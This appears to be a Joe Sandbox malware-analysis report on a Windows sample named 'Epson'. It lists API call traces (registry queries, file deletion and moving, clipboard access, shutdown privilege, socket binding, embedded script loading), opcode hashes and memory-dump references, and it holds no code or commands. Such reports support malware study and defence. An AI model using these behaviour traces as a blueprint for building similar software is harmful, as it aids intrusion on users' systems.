                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                      • Opcode ID: 751a69cd83e0095441986e2964197d87d193e74515bc8022d091e4aa921ec9ed
                                                                                                                                                                                                                                      • Instruction ID: 2a6f947650a6ea56307134c6588b9a5a829d1490717f8e7e18a2d86be1de4070
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 751a69cd83e0095441986e2964197d87d193e74515bc8022d091e4aa921ec9ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6731483190025E6ECB10AFB5DC4AFDE77ACAF04338F144159E900A7090D776EE45EA11
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FDC10E,?,?), ref: 00FDD415
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD451
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD4C8
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD4FE
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FDC99E
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00FDCA09
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FDCA2D
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00FDCA8C
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00FDCB47
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FDCBB4
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FDCC49
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00FDCC9A
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FDCD43
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FDCDE2
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FDCDEF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3102970594-0
                                                                                                                                                                                                                                      • Opcode ID: 9dee621ae86821e6d1b7a1e5fe68cd1eda69ce8540ecf5b4af60d14761086184
                                                                                                                                                                                                                                      • Instruction ID: f5de0218419e82598b82e78eb7b4d4d255271c1ba7abfb0d84b053655ecb2cd7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dee621ae86821e6d1b7a1e5fe68cd1eda69ce8540ecf5b4af60d14761086184
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A027271A04241AFC714DF24C895E2ABBE6EF88314F18849DF949CB3A2C735ED46DB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F55851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F555D1,?,?,00F94B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F55871
                                                                                                                                                                                                                                        • Part of subcall function 00FBEAB0: GetFileAttributesW.KERNEL32(?,00FBD840), ref: 00FBEAB1
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FBD9CD
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00FBDA88
                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00FBDA9B
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FBDAB8
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FBDAE2
                                                                                                                                                                                                                                        • Part of subcall function 00FBDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00FBDAC7,?,?), ref: 00FBDB5D
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00FBDAFE
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FBDB0F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                      • Opcode ID: 19b65e43d0e26c043630ed2f20623c291d0e9133940dc5a34e729f63ec039198
                                                                                                                                                                                                                                      • Instruction ID: eeed5d285b9dffd37cff2aa83e3a0ea66528b4b42e5b69c6bd0a1165855309f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b65e43d0e26c043630ed2f20623c291d0e9133940dc5a34e729f63ec039198
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC614931C0114DAECF05EBA1CD929EDB7B9AF15301F2040A5E902B7192EB396F09EF61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                                                                                      • Opcode ID: 8ea997fd5e988064c009b7bd558e97fbb2bb611913e1aa5fb8c63247df045ed5
                                                                                                                                                                                                                                      • Instruction ID: 8288261fed0b39d67282897171ad541c3edb61dc8d65ca9a288a6c453eb17ed6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ea997fd5e988064c009b7bd558e97fbb2bb611913e1aa5fb8c63247df045ed5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B41BD31A04642AFD720CF14D989F15BBE1EF44368F14C4ACE8198FAA2C735ED46EB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FB2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FB205A
                                                                                                                                                                                                                                        • Part of subcall function 00FB2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FB2087
                                                                                                                                                                                                                                        • Part of subcall function 00FB2010: GetLastError.KERNEL32 ref: 00FB2097
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00FBF249
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                      • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                      • Opcode ID: 84caa85a5a910d67d680cf206fdef3f3cfb33a363c4d482c66bd63f0d17cf0e6
                                                                                                                                                                                                                                      • Instruction ID: fd055c9956e47471cfc8e94f7dcf5b87dc003b03051de884eb2133d675a796f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84caa85a5a910d67d680cf206fdef3f3cfb33a363c4d482c66bd63f0d17cf0e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F01F97BA102146FEB1466BA9CCAFFF726C9F08354F150531FD02E61D1D5645D08BA90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8BD54
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8BD78
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8BEFF
                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FF46D0), ref: 00F8BF11
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0102221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F8BF89
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,01022270,000000FF,?,0000003F,00000000,?), ref: 00F8BFB6
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8C0CB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 314583886-0
                                                                                                                                                                                                                                      • Opcode ID: 81960263cc90bd5603255fb80646ab1a078e7954d69b6d76e9546f88b94fa93a
                                                                                                                                                                                                                                      • Instruction ID: 697f9413d53be540af878b39046d41b52459c582b6468ac6791ef6fdc676c8b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81960263cc90bd5603255fb80646ab1a078e7954d69b6d76e9546f88b94fa93a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8C12932D00205AFDB20BF78CC45BEA7BB8EF46320F24419AE594DB251E7359E41EB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F956C2,?,?,00000000,00000000), ref: 00FC3A1E
                                                                                                                                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F956C2,?,?,00000000,00000000), ref: 00FC3A35
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00F956C2,?,?,00000000,00000000,?,?,?,?,?,?,00F566CE), ref: 00FC3A45
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00F956C2,?,?,00000000,00000000,?,?,?,?,?,?,00F566CE), ref: 00FC3A56
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00F956C2,?,?,00F956C2,?,?,00000000,00000000,?,?,?,?,?,?,00F566CE,?), ref: 00FC3A65
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                      • String ID: SCRIPT
                                                                                                                                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                      • Opcode ID: 62821a686d1bc9182f17202e2da7c767d6f006aab292d9885bc680a45baa3933
                                                                                                                                                                                                                                      • Instruction ID: 61f3e11e60cfc9e64568a1f0a77a7ce30a78cb75a9a76ca8cabe475946f78e78
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62821a686d1bc9182f17202e2da7c767d6f006aab292d9885bc680a45baa3933
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7111CE74600306BFD7208F25DD89F277BB9EBC5B50F10826CF502DA150DB71DD00A621
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FB1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FB1916
                                                                                                                                                                                                                                        • Part of subcall function 00FB1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FB1922
                                                                                                                                                                                                                                        • Part of subcall function 00FB1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FB1931
                                                                                                                                                                                                                                        • Part of subcall function 00FB1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FB1938
                                                                                                                                                                                                                                        • Part of subcall function 00FB1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FB194E
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00FB1C81), ref: 00FB20FB
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FB2107
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FB210E
                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FB2127
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00FB1C81), ref: 00FB213B
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB2142
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3008561057-0
                                                                                                                                                                                                                                      • Opcode ID: f8f1d007aebed899d7ea1568ed7d07710e2ab8e9917da91dfc8149db6139bf0c
                                                                                                                                                                                                                                      • Instruction ID: 188185e29c309d86ff5fc1c7fc37dfcf1ba8523f5314946e2721a1db37637bcd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8f1d007aebed899d7ea1568ed7d07710e2ab8e9917da91dfc8149db6139bf0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D011D072901208FFEB509F69CC89BEE7BB9EF45365F144018E9419B120C7399A40EF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00FCA5BD
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00FCA6D0
                                                                                                                                                                                                                                        • Part of subcall function 00FC42B9: GetInputState.USER32 ref: 00FC4310
                                                                                                                                                                                                                                        • Part of subcall function 00FC42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC43AB
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00FCA5ED
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00FCA6BA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                      • Opcode ID: e4ba7df4daaaf9b33a50fb21ac92667da4c9f89583c44b456a25be385d11a00c
                                                                                                                                                                                                                                      • Instruction ID: c314684d134887504d28aa0106442855f6b30638363c6150d4e1b8314da9321d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4ba7df4daaaf9b33a50fb21ac92667da4c9f89583c44b456a25be385d11a00c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7415E7190020EAFCB14DFA4CD46FEEBBB4AF05314F14405AE915A61A1EB35AE44EB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,?), ref: 00F5233E
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00F52421
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00F52434
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$Proc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 929743424-0
                                                                                                                                                                                                                                      • Opcode ID: f63338caa66fef5b991aabcc391f6845ea051e2166f24ee4963a2b8fcd6598ba
                                                                                                                                                                                                                                      • Instruction ID: c7deab2b8da3a324d075152cf9ecf9d96666b630ab3935e746c0a7c0c6f1aff6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f63338caa66fef5b991aabcc391f6845ea051e2166f24ee4963a2b8fcd6598ba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC8157B2508440BAFA78A6794C88F7F254EEB43362B150309FB02C6596C95D9F0AF272
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FD3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FD3AD7
                                                                                                                                                                                                                                        • Part of subcall function 00FD3AAB: _wcslen.LIBCMT ref: 00FD3AF8
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00FD22BA
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00FD22E1
                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00FD2338
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00FD2343
                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00FD2372
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1601658205-0
                                                                                                                                                                                                                                      • Opcode ID: 813720d3f06d7791f52c5be369a0818678dc2446f549e2c7db1cf72997349379
                                                                                                                                                                                                                                      • Instruction ID: f42d7aa520219b67f59ab30de43f922a6bf03a2000c1f1f7b1be50ee8c1e2004
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 813720d3f06d7791f52c5be369a0818678dc2446f549e2c7db1cf72997349379
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F851B375A00200AFE710AF24C886F6A77E5AB44754F088099F9459F3D3C779AD42EBE1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                                                                                      • Opcode ID: 2982cff0aee5accb6c7fd6f5bcc135e3c40b182c6857cf239f04429de2835cf9
                                                                                                                                                                                                                                      • Instruction ID: 896df82c716637366f815c13177ba0fb77ba75aeb4a6af97cbad118e20357392
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2982cff0aee5accb6c7fd6f5bcc135e3c40b182c6857cf239f04429de2835cf9
